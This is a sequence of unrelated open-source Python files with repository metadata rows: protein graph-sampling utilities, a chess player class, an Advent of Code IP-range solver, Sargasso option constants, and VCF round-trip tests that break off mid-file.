groupconversation = GroupConversationSerializer()
class Meta:
model = Group
fields = ('id', 'name', 'user_set', 'groupconversation')
| gpl-2.0 | -2,556,878,542,363,221,000 | 26.386139 | 88 | 0.770065 | false |
yotamfr/prot2vec | src/python/dingo_utils.py | 1 | 19157 | import torch
import os
import sys
import itertools
import threading
from concurrent.futures import ThreadPoolExecutor
from src.python.preprocess2 import *
from blast import *
from tempfile import gettempdir
tmp_dir = gettempdir()
out_dir = "./Data"
from scipy.stats import *
import pickle
NUM_CPU = 8
eps = 10e-6
E = ThreadPoolExecutor(NUM_CPU)
np.random.seed(101)
tmp_dir = gettempdir()
EVAL = 10e6
verbose = False
def save_object(obj, filename):
with open(filename, 'wb') as output:
try:
pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)
except RecursionError:
sys.setrecursionlimit(2 * sys.getrecursionlimit())
save_object(obj, filename)
def load_object(pth):
with open(pth, 'rb') as f:
loaded_dist_mat = pickle.load(f)
assert len(loaded_dist_mat) > 0
return loaded_dist_mat
def to_fasta(seq_map, out_file):
sequences = []
for unipid, seq in seq_map.items():
sequences.append(SeqRecord(BioSeq(seq), unipid))
SeqIO.write(sequences, open(out_file, 'w+'), "fasta")
def load_nature_repr_set(db):
def to_fasta(seq_map, out_file):
sequences = []
for unipid, seq in seq_map.items():
sequences.append(SeqRecord(BioSeq(seq), unipid))
SeqIO.write(sequences, open(out_file, 'w+'), "fasta")
repr_pth, all_pth = '%s/sp.nr.70' % out_dir, '%s/sp.fasta' % out_dir
fasta_fname = '%s/sp.nr.70' % out_dir
if not os.path.exists(repr_pth):
query = {"db": "sp"}
num_seq = db.uniprot.count(query)
src_seq = db.uniprot.find(query)
sp_seqs = UniprotCollectionLoader(src_seq, num_seq).load()
to_fasta(sp_seqs, all_pth)
os.system("cdhit/cd-hit -i %s -o %s -c 0.7 -n 5" % (all_pth, repr_pth))
num_seq = count_lines(fasta_fname, sep=bytes('>', 'utf8'))
fasta_src = parse_fasta(open(fasta_fname, 'r'), 'fasta')
seq_map = FastaFileLoader(fasta_src, num_seq).load()
all_seqs = [Seq(uid, str(seq)) for uid, seq in seq_map.items()]
return all_seqs
def get_distribution(dataset):
assert len(dataset) >= 3
return Distribution(dataset)
class Distribution(object):
def __init__(self, dataset):
self.pdf = gaussian_kde([d * 10 for d in dataset])
def __call__(self, *args, **kwargs):
assert len(args) == 1
# return self.pdf.integrate_box_1d(np.min(self.pdf.dataset), args[0])
return self.pdf(args[0])[0]
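# Hedged example (not part of the original file): Distribution builds a KDE
# over the dataset scaled by 10, so the value handed to __call__ is expected to
# already live on that scaled axis.  The numbers below are made up.
def _example_distribution():
    dist = Distribution([0.1, 0.2, 0.25, 0.3])
    return dist(2.5)   # density evaluated near 0.25 * 10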
class Histogram(object):
def __init__(self, dataset):
self.bins = {(a, a + 1): .01 for a in range(10)}
for p in dataset:
a = min(int(p * 10), 9)
self.bins[(a, a + 1)] += 0.9 / len(dataset)
def __call__(self, *args, **kwargs):
v = int(args[0] * 10)
return self.bins[(v, v + 1)]
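# Hedged example (not part of the original file): Histogram spreads 90% of the
# mass over the observed tenth-wide bins on top of a 0.01 floor per bin; note
# that __call__ does not clamp, so inputs are assumed to stay below 1.0.
def _example_histogram():
    hist = Histogram([0.05, 0.15, 0.15, 0.95])
    return hist(0.15)   # bin (1, 2): 0.01 + 2 * (0.9 / 4) = 0.46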
class NaiveBayes(object):
def __init__(self, dist_pos, dist_neg):
self.dist_pos = dist_pos
self.dist_neg = dist_neg
def infer(self, val, prior):
dist_pos = self.dist_pos
dist_neg = self.dist_neg
return np.log(prior) + np.log(dist_pos(val)) - np.log(dist_neg(val))
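# Hedged example (not part of the original file): NaiveBayes.infer returns a
# log-odds style score combining the prior with the two fitted densities; the
# toy datasets below are invented and, after Distribution's internal x10
# scaling, the query value 8.0 sits inside the positive class.
def _example_naive_bayes():
    dist_pos = Distribution([0.7, 0.8, 0.9])
    dist_neg = Distribution([0.1, 0.2, 0.3])
    model = NaiveBayes(dist_pos, dist_neg)
    return model.infer(8.0, prior=0.5)   # positive score favours the positive class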
class ThreadSafeDict(dict) :
def __init__(self, * p_arg, ** n_arg) :
dict.__init__(self, * p_arg, ** n_arg)
self._lock = threading.Lock()
def __enter__(self) :
self._lock.acquire()
return self
def __exit__(self, type, value, traceback) :
self._lock.release()
class Seq(object):
def __init__(self, uid, seq, aa20=True):
if aa20:
self.seq = seq.replace('U', 'C').replace('O', 'K')\
.replace('X', np.random.choice(amino_acids))\
.replace('B', np.random.choice(['N', 'D']))\
.replace('Z', np.random.choice(['E', 'Q']))
else:
self.seq = seq
self.uid = uid
self.msa = None
self.f = dict()
def __hash__(self):
return hash(self.uid)
def __repr__(self):
return "Seq(%s, %s)" % (self.uid, self.seq)
def __eq__(self, other):
if isinstance(other, Seq):
return self.uid == other.uid
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __len__(self):
return len(self.seq)
class Node(object):
def __init__(self, go, sequences, fathers, children):
self.go = go
self.sequences = sequences
self.fathers = fathers
self.children = children
self._f_dist_out = None
self._f_dist_in = None
self._plus = None
self._ancestors = None
self._descendants = None
self.seq2vec = {}
self.dataset = [] # for K-S tests
def __iter__(self):
for seq in self.sequences:
yield seq
def __repr__(self):
return "Node(%s, %d)" % (self.go, self.size)
def __hash__(self):
return hash(self.go)
def __eq__(self, other):
if isinstance(other, Node):
return self.go == other.go
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def is_leaf(self):
return len(self.children) == 0
def is_root(self):
return len(self.fathers) == 0
@property
def cousins(self):
ret = set()
for father in self.fathers:
ret |= set(father.children)
return ret - {self}
@property
def ancestors(self):
if not self._ancestors:
self._ancestors = get_ancestors(self)
return self._ancestors
@property
def descendants(self):
if not self._descendants:
self._descendants = get_descendants(self)
return self._descendants
@property
def plus(self):
if not self._plus:
union = sequences_of(self.children)
assert len(union) <= self.size
self._plus = list(self.sequences - union)
return self._plus
@property
def size(self):
return len(self.sequences)
@property
def f_dist_out(self):
if self._f_dist_out:
return self._f_dist_out
else:
raise(KeyError("f_dist_out not computed for %s" % self))
@property
def f_dist_in(self):
if self._f_dist_in:
return self._f_dist_in
else:
raise(KeyError("f_dist_in not computed for %s" % self))
def sample(self, m):
n = min(self.size, m)
sequences = self.sequences
        s = set(np.random.choice(list(sequences), n, replace=False))
assert len(s) == n > 0
return s
def get_ancestors(node):
Q = [node]
visited = {node}
while Q:
curr = Q.pop()
for father in curr.fathers:
if father in visited or father.is_root():
continue
visited.add(father)
Q.append(father)
return visited
def get_descendants(node):
Q = [node]
visited = {node}
while Q:
curr = Q.pop()
for child in curr.children:
if child in visited:
continue
visited.add(child)
Q.append(child)
return visited
def sequences_of(nodes):
return reduce(lambda s1, s2: s1 | s2,
map(lambda node: node.sequences, nodes), set())
def compute_node_prior(node, graph, grace=0.0):
node.prior = grace + (1 - grace) * node.size / len(graph.sequences)
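# Hedged illustration (not part of the original file): the prior mixes a fixed
# "grace" floor with the node's share of all sequences.  The stand-in numbers
# below are invented; a node holding 10 of 100 sequences with grace=0.5 gets
# prior 0.5 + 0.5 * 0.1 = 0.55.
def _example_node_prior(node_size=10, total_sequences=100, grace=0.5):
    return grace + (1 - grace) * node_size / float(total_sequences)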
class Graph(object):
def __init__(self, onto, uid2seq, go2ids, grace=0.5):
self._nodes = nodes = {}
self.sequences = sequences = set()
# self.onto = onto
nodes[onto.root] = self.root = Node(onto.root, set(), [], [])
for go, ids in go2ids.items():
seqs = set([Seq(uid, uid2seq[uid]) for uid in ids])
nodes[go] = Node(go, seqs, [], [])
sequences |= seqs
for go, obj in onto._graph._node.items():
if 'is_a' not in obj:
assert go == onto.root
continue
if go not in go2ids:
assert go not in nodes
continue
if go not in nodes:
assert go not in go2ids
continue
for father in obj['is_a']:
nodes[go].fathers.append(nodes[father])
nodes[father].children.append(nodes[go])
for node in nodes.values():
if node.is_leaf():
assert node.size > 0
continue
children = node.children
for child in children:
assert child.size > 0
node.sequences |= child.sequences
for node in nodes.values():
compute_node_prior(node, self, grace)
def prune(self, gte):
to_be_deleted = []
for go, node in self._nodes.items():
if node.size >= gte:
continue
for father in node.fathers:
father.children.remove(node)
for child in node.children:
child.fathers.remove(node)
to_be_deleted.append(node)
for node in to_be_deleted:
del self._nodes[node.go]
return to_be_deleted
def __len__(self):
return len(self._nodes)
def __iter__(self):
for node in self._nodes.values():
yield node
def __getitem__(self, go):
return self._nodes[go]
def __contains__(self, go):
return go in self._nodes
@property
def leaves(self):
return [node for node in self if node.is_leaf()]
@property
def nodes(self):
return list(self._nodes.values())
def sample(self, max_add_to_sample=10):
def sample_recursive(node, sampled):
if not node.is_leaf():
for child in node.children:
sampled |= sample_recursive(child, sampled)
plus = node.plus
s = min(max_add_to_sample, len(plus))
if s > 0:
sampled |= set(np.random.choice(plus, s, replace=False))
return sampled
return sample_recursive(self.root, set())
def sample_pairs(nodes, include_node, sample_size=10000):
pairs = set()
pbar = tqdm(range(len(nodes)), desc="nodes sampled")
for node in nodes:
pbar.update(1)
s_in = min(200, node.size)
sample_in = np.random.choice(list(node.sequences), s_in, replace=False)
if include_node:
pairs |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
else:
pairs |= set((seq1, seq2) for seq1, seq2 in itertools.combinations(sample_in, 2))
pbar.close()
n = len(pairs)
pairs_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
return np.asarray(list(pairs))[pairs_indices, :]
def sample_pairs_iou(graph, sample_size=10000):
data = set()
leaf_pairs = list(itertools.combinations(list(graph.leaves), 2))
n = len(leaf_pairs)
indices = np.random.choice(list(range(n)), sample_size, replace=False)
pbar = tqdm(range(len(indices)), desc="nodes sampled")
for leaf1, leaf2 in np.asarray(leaf_pairs)[indices, :]:
intersection = leaf1.ancestors & leaf2.ancestors
union = leaf1.ancestors | leaf2.ancestors
iou = len(intersection) / len(union)
iou = 2 * iou - 1 # scale to [-1, 1]
sequences1 = list(leaf1.sequences - leaf2.sequences)
sequences2 = list(leaf2.sequences - leaf1.sequences)
s1 = min(len(sequences1), 100)
sample1 = np.random.choice(list(sequences1), s1, replace=False) if sequences1 else []
s2 = min(len(sequences2), 100)
sample2 = np.random.choice(list(sequences2), s2, replace=False) if sequences2 else []
data |= set((seq1, seq2, leaf1, 1) for seq1, seq2 in itertools.combinations(sample1, 2))
data |= set((seq1, seq2, leaf2, 1) for seq1, seq2 in itertools.combinations(sample2, 2))
data |= set((seq1, seq2, leaf1, iou) for seq1 in sample1 for seq2 in sample2)
data |= set((seq2, seq1, leaf2, iou) for seq2 in sample2 for seq1 in sample1)
pbar.update(1)
pbar.close()
n = len(data)
indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
return np.asarray(list(data))[indices, :]
def sample_pos_neg_no_common_ancestors(graph, sample_size=10000):
pos, neg = set(), set()
root_children = set(graph.root.children)
seq2nodes = {}
for node in graph:
for seq in node.sequences:
if seq in seq2nodes:
seq2nodes[seq].add(node)
else:
seq2nodes[seq] = {node}
pbar = tqdm(range(len(graph)), desc="nodes sampled")
for node in graph:
pbar.update(1)
if not node.is_leaf():
continue
list_in = list(node.sequences)
s_in = min(100, len(list_in))
sample_in = np.random.choice(list_in, s_in, replace=False)
pos |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
non_ancestors = root_children - node.ancestors
if not non_ancestors:
continue
distant = np.random.choice(list(non_ancestors))
for child in distant.descendants:
if not child.is_leaf():
continue
list_out = list(filter(lambda s: node not in seq2nodes[s], child.sequences))
if not list_out:
continue
s_out = min(100, len(list_out))
sample_out = np.random.choice(list_out, s_out, replace=False)
neg |= set((seq1, seq2, distant) for seq1 in sample_out for seq2 in sample_in)
pbar.close()
n, m = len(pos), len(neg)
pos_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
neg_indices = np.random.choice(list(range(m)), min(m, sample_size), replace=False)
return np.asarray(list(pos))[pos_indices, :], np.asarray(list(neg))[neg_indices, :]
def sample_pos_neg(graph, sample_size=10000):
pos, neg = set(), set()
pbar = tqdm(range(len(graph)), desc="nodes sampled")
for node in graph:
pbar.update(1)
if not node.is_leaf():
continue
s_in = min(100, node.size)
sample_in = np.random.choice(list(node.sequences), s_in, replace=False)
pos |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
for cousin in node.cousins:
cousin_sequences = cousin.sequences - node.sequences
if not cousin_sequences:
continue
s_out = min(100, len(cousin_sequences))
sample_out = np.random.choice(list(cousin_sequences), s_out, replace=False)
neg |= set((seq1, seq2, cousin) for seq1 in sample_out for seq2 in sample_in)
pbar.close()
n, m = len(pos), len(neg)
pos_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
neg_indices = np.random.choice(list(range(m)), min(m, sample_size), replace=False)
return np.asarray(list(pos))[pos_indices, :], np.asarray(list(neg))[neg_indices, :]
def run_metric_on_triplets(metric, triplets, verbose=True):
data = []
n = len(triplets)
if verbose:
pbar = tqdm(range(n), desc="triplets processed")
for i, (seq1, seq2, node) in enumerate(triplets):
data.append(metric(seq1, seq2, node))
if verbose:
pbar.update(1)
if verbose:
pbar.close()
return data
def run_metric_on_pairs(metric, pairs, verbose=True):
data = []
n = len(pairs)
if verbose:
pbar = tqdm(range(n), desc="triplets processed")
for i, (seq, node) in enumerate(pairs):
data.append(metric(seq, node))
if verbose:
pbar.update(1)
if verbose:
pbar.close()
return data
def l2_norm(seq, node):
vec = node.seq2vec[seq]
return np.linalg.norm(vec)
def cosine_similarity(seq1, seq2, node):
vec1 = node.seq2vec[seq1]
vec2 = node.seq2vec[seq2]
ret = fast_cosine_similarity(vec1, [vec2])
return ret[0]
def fast_cosine_similarity(vector, vectors, scale_zero_one=False):
vectors = np.asarray(vectors)
dotted = vectors.dot(vector)
matrix_norms = np.linalg.norm(vectors, axis=1)
vector_norm = np.linalg.norm(vector)
matrix_vector_norms = np.multiply(matrix_norms, vector_norm)
neighbors = np.divide(dotted, matrix_vector_norms).ravel()
if scale_zero_one:
return (neighbors + 1) / 2
else:
return neighbors
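# Hedged example (not part of the original file): fast_cosine_similarity scores
# one query vector against several stored vectors in a single vectorised pass;
# the 2-D toy vectors are illustrative only.
def _example_fast_cosine_similarity():
    query = np.array([1.0, 0.0])
    stored = [np.array([1.0, 0.0]), np.array([0.0, 1.0]), np.array([-1.0, 0.0])]
    return fast_cosine_similarity(query, stored)   # approximately [1.0, 0.0, -1.0]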
def kolmogorov_smirnov_cosine(pos, neg, metric):
data1 = run_metric_on_triplets(metric, pos)
data2 = run_metric_on_triplets(metric, neg)
save_object(data1, "Data/dingo_%s_ks_cosine_pos_data" % asp)
save_object(data2, "Data/dingo_%s_ks_cosine_neg_data" % asp)
return ks_2samp(data1, data2)
def kolmogorov_smirnov_norm(pos, neg, metric):
data1 = run_metric_on_pairs(metric, pos)
data2 = run_metric_on_pairs(metric, neg)
save_object(data1, "Data/dingo_%s_ks_norm_pos_data" % asp)
save_object(data2, "Data/dingo_%s_ks_norm_neg_data" % asp)
return ks_2samp(data1, data2)
if __name__ == "__main__":
cleanup()
from pymongo import MongoClient
client = MongoClient('mongodb://localhost:27017/')
db = client['prot2vec']
asp = 'F' # molecular function
onto = get_ontology(asp)
t0 = datetime.datetime(2014, 1, 1, 0, 0)
t1 = datetime.datetime(2014, 9, 1, 0, 0)
# t0 = datetime.datetime(2017, 1, 1, 0, 0)
# t1 = datetime.datetime.utcnow()
print("Indexing Data...")
trn_stream, tst_stream = get_training_and_validation_streams(db, t0, t1, asp)
print("Loading Training Data...")
uid2seq_trn, _, go2ids_trn = trn_stream.to_dictionaries(propagate=True)
print("Loading Validation Data...")
uid2seq_tst, _, go2ids_tst = tst_stream.to_dictionaries(propagate=True)
print("Building Graph...")
graph = Graph(onto, uid2seq_trn, go2ids_trn)
print("Graph contains %d nodes" % len(graph))
print("Load DigoNet")
go_embedding_weights = np.asarray([onto.todense(go) for go in onto.classes])
net = AttnDecoder(ATTN, 100, 10, go_embedding_weights)
net = net.cuda()
# ckpth = "/tmp/digo_0.01438.tar"
ckpth = "/tmp/digo_0.15157.tar"
print("=> loading checkpoint '%s'" % ckpth)
checkpoint = torch.load(ckpth, map_location=lambda storage, loc: storage)
net.load_state_dict(checkpoint['net'])
print("Running K-S tests...")
pos, neg = sample_pos_neg(graph)
data_pos, data_neg = [], []
for (p_s1, p_s2, p_n), (n_s1, n_s2, n_n) in zip(pos, neg):
data_pos.append((p_s1, p_n))
data_pos.append((p_s2, p_n))
data_neg.append((n_s1, n_n))
data_neg.append((n_s2, n_n))
compute_vectors(data_pos, net, onto)
compute_vectors(data_neg, net, onto)
res = kolmogorov_smirnov_norm(data_pos, data_neg, l2_norm)
print("K-S l2_norm: %s, %s" % res)
res = kolmogorov_smirnov_cosine(pos, neg, cosine_similarity)
print("K-S cosine: %s, %s" % res)
| mit | -2,146,032,486,321,290,800 | 30.200326 | 99 | 0.577909 | false |
erget/KingSnake | king_snake/player.py | 1 | 3615 | """A chess player."""
from king_snake.errors import (FieldMustBeCastledError,
FieldOccupiedError,
IllegalMoveError,
PawnMustCaptureError,
TurnError)
from king_snake.figures import Pawn, Rook, Knight, Bishop, Queen, King
class Player(object):
"""A chess player."""
def __repr__(self):
return "Player()"
def __str__(self):
if self.chessboard:
return_string = ("{color} Player on "
"{chessboard}\n"
"Figures: "
"{figures}".format(color=self.color,
chessboard=self.chessboard,
figures=self.figures))
else:
return_string = self.__repr__()
return return_string
def __init__(self):
self.chessboard = None
self.figures = None
self.king = None
self.color = None
@property
def opponent(self):
"""Return other player in chess game"""
if self.color == "white":
return self.chessboard.players["black"]
else:
return self.chessboard.players["white"]
def set_up_board(self, chessboard):
"""Set up pieces on given chessboard and find other player."""
self.chessboard = chessboard
if self == self.chessboard.players["white"]:
self.color = "white"
else:
self.color = "black"
self.figures = list(Pawn(self) for pawns in range(8))
for doubled_piece in (Rook, Knight, Bishop) * 2:
self.figures.append(doubled_piece(self))
self.figures.append(Queen(self))
self.king = King(self)
self.figures.append(self.king)
def move(self, start, goal):
"""
Move a piece to a new field.
First verify if self is the chessboard's current player. Then check if
a moveable figure is located at the start field. If the piece can be
moved, move to the goal field, capturing a figure at the goal field if
necessary. Finally, check if the move would put the own king in check.
If yes, roll back the move. Otherwise, record the current turn on all
moved pieces and end the turn.
        @param start - String used to look up the start field object (e.g. "E2")
        @param goal - Like start, but for the destination field
"""
if self != self.chessboard.current_player:
raise TurnError("Move attempted out of turn.")
start_field = self.chessboard.fields[start]
goal_field = self.chessboard.fields[goal]
figure = start_field.figure
if not figure in self.figures:
raise IllegalMoveError("Player does not own a piece at given "
"position.")
try:
figure.move(goal_field)
captured_piece = None
except (FieldOccupiedError, PawnMustCaptureError):
captured_piece = figure.capture(goal_field)
except FieldMustBeCastledError:
captured_piece = figure.castle(goal_field)
if self.king.in_check:
self.chessboard.rollback()
raise IllegalMoveError("Move would put player's king in check.")
figure.already_moved = True
figure.last_moved = self.chessboard.current_move
if captured_piece:
captured_piece.last_moved = self.chessboard.current_move
self.chessboard.end_turn(start, goal)
| gpl-3.0 | -8,314,341,011,309,242,000 | 35.515152 | 78 | 0.561549 | false |
madfist/aoc2016 | aoc2016/day20/main.py | 1 | 1033 | import sys
import re
def prepare(data):
ranges = []
for d in data.split('\n'):
m = re.match(r'(\d+)-(\d+)', d)
ranges.append([int(m.group(1)), int(m.group(2))])
return sorted(ranges, key=lambda r:r[0])
def get_lowest(data):
sr = prepare(data)
high = sr[0][1]
for i in range(1,len(sr)):
if sr[i][0] > high+1:
return high+1
high = max(high, sr[i][1])
def count_all(data):
sr = prepare(data)
high = sr[0][1]
count = 0
for i in range(1,len(sr)):
if high+1 < sr[i][0]:
count += sr[i][0] - high - 1
high = max(sr[i][1], high)
if high < 4294967295:
count += 4294967295 - high
return count
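# Hedged example (not part of the original solution): with the tiny blacklist
# below, 3 is the lowest allowed address, and out of the full 0..4294967295
# range only address 3 plus everything above 8 remains allowed.
def _example_ranges():
    data = "0-2\n4-7\n5-8"
    assert get_lowest(data) == 3
    assert count_all(data) == 1 + (4294967295 - 8)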
def main():
if (len(sys.argv) < 2):
print("Usage: python3", sys.argv[0], "<data>")
exit(1)
with open(sys.argv[1], 'r') as input:
data = input.read()
print("Lowest available:", get_lowest(data))
print("Available addresses:", count_all(data))
if __name__ == '__main__':
main() | mit | 201,707,456,742,472,450 | 24.219512 | 57 | 0.518877 | false |
statbio/Sargasso | sargasso/separator/options.py | 1 | 1111 | import logging
DATA_TYPE_ARG = "<data-type>"
SAMPLES_FILE_ARG = "<samples-file>"
OUTPUT_DIR_ARG = "<output-dir>"
SPECIES_ARG = "<species>"
SPECIES_INFO_ARG = "<species-info>"
READS_BASE_DIR = "--reads-base-dir"
NUM_THREADS = "--num-threads"
MISMATCH_THRESHOLD = "--mismatch-threshold"
MISMATCH_THRESHOLD_ARG = "<mismatch-threshold>"
MINMATCH_THRESHOLD = "--minmatch-threshold"
MINMATCH_THRESHOLD_ARG = "<minmatch-threshold>"
MULTIMAP_THRESHOLD = "--multimap-threshold"
MULTIMAP_THRESHOLD_ARG = "<multimap-threshold>"
REJECT_MULTIMAPS = "--reject-multimaps"
OPTIMAL_STRATEGY = "--best"
CONSERVATIVE_STRATEGY = "--conservative"
RECALL_STRATEGY = "--recall"
PERMISSIVE_STRATEGY = "--permissive"
RUN_SEPARATION = "--run-separation"
DELETE_INTERMEDIATE = "--delete-intermediate"
MAPPER_EXECUTABLE = "--mapper-executable"
MAPPER_INDEX_EXECUTABLE = "--mapper-index-executable"
SAMBAMBA_SORT_TMP_DIR = "--sambamba-sort-tmp-dir"
SPECIES_NAME = "species-name"
GTF_FILE = "gtf-file"
GENOME_FASTA = "genome-fasta"
MAPPER_INDEX = "mapper-index"
SAMPLE_INFO_INDEX = "sample_info"
SPECIES_OPTIONS_INDEX = "species_options"
| mit | 2,915,778,257,924,116,500 | 32.666667 | 53 | 0.734473 | false |
latticelabs/Mitty | mitty/tests/lib/vcf2pop_test.py | 1 | 11185 | import numpy as np
from numpy.testing import assert_array_equal
import mitty.lib.vcf2pop as vcf2pop
import mitty.lib.mio as mio
import mitty.lib.variants as vr
import mitty.tests
import os
import tempfile
def round_trip_test():
"""vcf <-> mitty database round trip"""
genome_metadata = [
{'seq_id': 'NC_010127.1', 'seq_len': 422616, 'seq_md5': 'fe4be2f3bc5a7754085ceaa39a5c0414'},
{'seq_id': 'NC_010128.1', 'seq_len': 457013, 'seq_md5': '99880025dcbcba5dbf72f437092903c3'},
{'seq_id': 'NC_010129.1', 'seq_len': 481791, 'seq_md5': 'a3a5142f08b313f645cd5e972f5f3397'},
{'seq_id': 'NC_010130.1', 'seq_len': 513455, 'seq_md5': 'ec8ff24820287d35c2b615fbb0df721c'},
]
variant_data = [
{'pos': [1, 100, 200], 'stop': [2, 101, 201], 'ref': ['A', 'C', 'G'], 'alt': ['G', 'T', 'C'], 'p': [0.5, 0.5, 0.5]},
{'pos': [1, 100, 200], 'stop': [2, 101, 201], 'ref': ['A', 'C', 'G'], 'alt': ['G', 'T', 'C'], 'p': [0.5, 0.5, 0.5]},
]
genotype_data = [
[(0, 2), (2, 0)],
[(1, 2), (2, 0)],
]
master_lists = {n + 1: vr.VariantList(vd['pos'], vd['stop'], vd['ref'], vd['alt'], vd['p']) for n, vd in enumerate(variant_data)}
for k, v in master_lists.iteritems(): v.sort()
pop = vr.Population(mode='w', genome_metadata=genome_metadata, in_memory=True)
for k, v in master_lists.iteritems():
pop.set_master_list(chrom=k, master_list=v)
for n in [0, 1]:
pop.add_sample_chromosome(n + 1, 'brown_fox', np.array(genotype_data[n], dtype=[('index', 'i4'), ('gt', 'i1')]))
_, vcf_temp = tempfile.mkstemp(dir=mitty.tests.data_dir, suffix='.vcf.gz')
_, h5_temp = tempfile.mkstemp(dir=mitty.tests.data_dir, suffix='.h5')
mio.write_single_sample_to_vcf(pop, out_fname=vcf_temp, sample_name='brown_fox')
pop2 = vcf2pop.vcf_to_pop(vcf_temp, h5_temp, sample_name='brown_fox')
# for k, v in master_lists.iteritems():
# assert_array_equal(pop.get_sample_variant_index_for_chromosome(k, 'brown_fox'), pop2.get_sample_variant_index_for_chromosome(k, 'brown_fox'))
for n in [0, 1]: # Chromosomes
for v1, v2 in zip(pop2.get_sample_variant_index_for_chromosome(n + 1, 'brown_fox'), genotype_data[n]):
assert v1[1] == v2[1] # Genotypes match
for k in ['pos', 'stop', 'ref', 'alt']:
assert pop2.get_variant_master_list(n + 1).variants[v1[0]][k] == master_lists[n + 1].variants[v2[0]][k] # Variant data match
os.remove(vcf_temp)
def vcf_reader_test1():
"""VCF with no GT data"""
_vcf = """##fileformat=VCFv4.1
##contig=<ID=NC_010142.1,length=908485,md5=9a28f270df93bb4ac0764676de1866b3>
##contig=<ID=NC_010143.1,length=1232258,md5=ab882206d71bc36051f437e66246da6b>
##contig=<ID=NC_010144.1,length=1253087,md5=ab11fdfc260a2b78fdb845d89c7a89f2>
##contig=<ID=NC_010145.1,length=1282939,md5=b3c4b1a7b3671e2e8d4f4b1d2b599c44>
##contig=<ID=NC_010146.1,length=1621617,md5=3dbe62009f563fd1a6e3eadc15617e5c>
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO
NC_010142.1\t100\t.\tA\tT\t50\tPASS\tRS=672601345;RSPOS=1014319;VP=0x050060001205000002110200;GENEINFO=ISG15:9636;dbSNPBuildID=142;SAO=1;SSR=0;WGT=1;VC=DIV;PM;NSF;REF;ASP;LSD;OM;CLNHGVS=NC_000001.11:g.1014319dupG;CLNALLE=1;CLNSRC=OMIM_Allelic_Variant;CLNORIGIN=1;CLNSRCID=147571.0002;CLNSIG=5;CLNDSDB=MedGen:OMIM:Orphanet;CLNDSDBID=CN221808:616126:ORPHA319563;CLNDBN=Immunodeficiency_38;CLNREVSTAT=no_assertion_criteria_provided;CLNACC=RCV000148989.5
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\tRS=672601345;RSPOS=1014319;VP=0x050060001205000002110200;GENEINFO=ISG15:9636;dbSNPBuildID=142;SAO=1;SSR=0;WGT=1;VC=DIV;PM;NSF;REF;ASP;LSD;OM;CLNHGVS=NC_000001.11:g.1014319dupG;CLNALLE=1;CLNSRC=OMIM_Allelic_Variant;CLNORIGIN=1;CLNSRCID=147571.0002;CLNSIG=5;CLNDSDB=MedGen:OMIM:Orphanet;CLNDSDBID=CN221808:616126:ORPHA319563;CLNDBN=Immunodeficiency_38;CLNREVSTAT=no_assertion_criteria_provided;CLNACC=RCV000148989.5
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\tRS=672601345;RSPOS=1014319;VP=0x050060001205000002110200;GENEINFO=ISG15:9636;dbSNPBuildID=142;SAO=1;SSR=0;WGT=1;VC=DIV;PM;NSF;REF;ASP;LSD;OM;CLNHGVS=NC_000001.11:g.1014319dupG;CLNALLE=1;CLNSRC=OMIM_Allelic_Variant;CLNORIGIN=1;CLNSRCID=147571.0002;CLNSIG=5;CLNDSDB=MedGen:OMIM:Orphanet;CLNDSDBID=CN221808:616126:ORPHA319563;CLNDBN=Immunodeficiency_38;CLNREVSTAT=no_assertion_criteria_provided;CLNACC=RCV000148989.5
NC_010146.1\t100\t.\tA\tT\t50\tPASS\tRS=672601345;RSPOS=1014319;VP=0x050060001205000002110200;GENEINFO=ISG15:9636;dbSNPBuildID=142;SAO=1;SSR=0;WGT=1;VC=DIV;PM;NSF;REF;ASP;LSD;OM;CLNHGVS=NC_000001.11:g.1014319dupG;CLNALLE=1;CLNSRC=OMIM_Allelic_Variant;CLNORIGIN=1;CLNSRCID=147571.0002;CLNSIG=5;CLNDSDB=MedGen:OMIM:Orphanet;CLNDSDBID=CN221808:616126:ORPHA319563;CLNDBN=Immunodeficiency_38;CLNREVSTAT=no_assertion_criteria_provided;CLNACC=RCV000148989.5
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf1.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't1.h5')
open(vcf_name, 'w').write(_vcf)
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name)
assert p.get_chromosome_list() == [1, 2, 3, 4, 5], p.get_chromosome_list()
assert p.get_sample_names() == ['anon']
vl = p.get_sample_variant_list_for_chromosome(1,'anon')
assert_array_equal(vl[0], vl[1], vl)
assert vl[0][0]['pos'] == 99
vl = p.get_sample_variant_list_for_chromosome(2, 'anon')
assert vl[0].size == 0
vl = p.get_sample_variant_list_for_chromosome(5,'anon')
assert_array_equal(vl[0], vl[1], vl)
def vcf_reader_test2():
"""VCF with only GT data"""
_vcf = """##fileformat=VCFv4.1
##contig=<ID=NC_010142.1,length=908485,md5=9a28f270df93bb4ac0764676de1866b3>
##contig=<ID=NC_010143.1,length=1232258,md5=ab882206d71bc36051f437e66246da6b>
##contig=<ID=NC_010144.1,length=1253087,md5=ab11fdfc260a2b78fdb845d89c7a89f2>
##contig=<ID=NC_010145.1,length=1282939,md5=b3c4b1a7b3671e2e8d4f4b1d2b599c44>
##contig=<ID=NC_010146.1,length=1621617,md5=3dbe62009f563fd1a6e3eadc15617e5c>
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\ts1
NC_010142.1\t100\t.\tA\tT\t50\tPASS\t.\tGT\t0|1
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\t.\tGT\t1|0
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\t.\tGT\t1|1
NC_010146.1\t100\t.\tA\tT\t50\tPASS\t.\tGT\t.
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf2.vcf')
